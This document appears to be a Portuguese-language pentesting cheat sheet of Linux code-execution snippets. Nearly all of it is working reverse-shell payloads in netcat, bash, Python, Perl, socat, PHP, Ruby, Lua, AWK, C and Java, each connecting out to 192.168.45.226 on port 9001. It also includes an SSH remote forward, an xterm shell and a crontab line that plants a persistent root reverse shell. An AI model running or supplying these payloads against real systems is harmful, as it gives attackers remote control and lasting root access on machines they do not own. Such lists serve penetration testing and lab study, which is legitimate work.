Code Execution - Linux Snippets

Netcat - Reverse Shell

nc -e /bin/bash 192.168.45.226 9001

/bin/sh -i >& /dev/tcp/192.168.45.226/9001 0>&1

Cria um reverse shell usando netcat ou bash.

Bash - Reverse Shell

bash -i >& /dev/tcp/192.168.45.226/9001 0>&1

Executa um shell interativo em background via conexão TCP.

Python - Reverse Shell

python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.45.226",9001)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"]);'

Executa um shell reverso via Python, útil para sistemas sem nc.

Perl - Reverse Shell

perl -e 'use Socket;$i="192.168.45.226";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Executa um shell reverso via Perl.

Socat - Reverse Shell

socat TCP4:192.168.45.226:9001 EXEC:/bin/bash

socat file:`tty`,raw,echo=0 TCP:192.168.45.226:9001

Usa socat para abrir uma conexão reversa ou interativa.

PHP - Reverse Shell

php -r '$sock=fsockopen("192.168.45.226",9001);exec("/bin/sh -i <&3 >&3 2>&3");'

Útil para servidores web vulneráveis que executam PHP.

Ruby - Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("192.168.45.226",9001).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Executa um shell reverso via Ruby.

Lua - Reverse Shell

lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.45.226','9001');os.execute('/bin/sh -i <&3 >&3 2>&3');"

Executa um shell reverso via Lua.

AWK - Reverse Shell

awk 'BEGIN {s = "/inet/tcp/0/192.168.45.226/9001"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Executa um shell reverso via awk.

C - Reverse Shell

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = 9001;
    struct sockaddr_in revsockaddr;
    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;       
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("192.168.45.226");

    connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));
    dup2(sockt, 0); dup2(sockt, 1); dup2(sockt, 2);
    char * const argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL);
    return 0;       
}

Compilar com:

gcc shell.c -o shell -Wall

Executa um shell reverso via C.

Java - Reverse Shell

import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class ReverseShell {
    public static void main(String[] args) throws IOException {
        String host = "192.168.45.226";
        int port = 9001;
        String cmd = "/bin/sh";
        Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
        Socket s = new Socket(host, port);
        InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
        OutputStream po = p.getOutputStream(), so = s.getOutputStream();
        while (!s.isClosed()) {
            while (pi.available() > 0) so.write(pi.read());
            while (pe.available() > 0) so.write(pe.read());
            while (si.available() > 0) po.write(si.read());
            so.flush(); po.flush();
            try { p.exitValue(); break; } catch (Exception e) {}
        };
        p.destroy(); s.close();
    }
}

Compilar com:

javac ReverseShell.java
java ReverseShell

Executa um shell reverso via Java.

SSH - Forward Shell

ssh -R 9001:localhost:22 user@192.168.45.226

Encaminha a conexão SSH para um listener remoto.

Cronjob - Persistência

echo '* * * * * root /bin/bash -c "bash -i >& /dev/tcp/192.168.45.226/9001 0>&1"' >> /etc/crontab

Cria uma entrada no cron para execução automática do shell reverso.

/dev/tcp - Reverse Shell

exec 5<>/dev/tcp/192.168.45.226/9001; cat <&5 | while read line; do $line 2>&5 >&5; done

Usa /dev/tcp para criar um reverse shell.

Xterm - Reverse Shell

xterm -display 192.168.45.226:1

Requer um servidor X11 rodando no sistema atacante.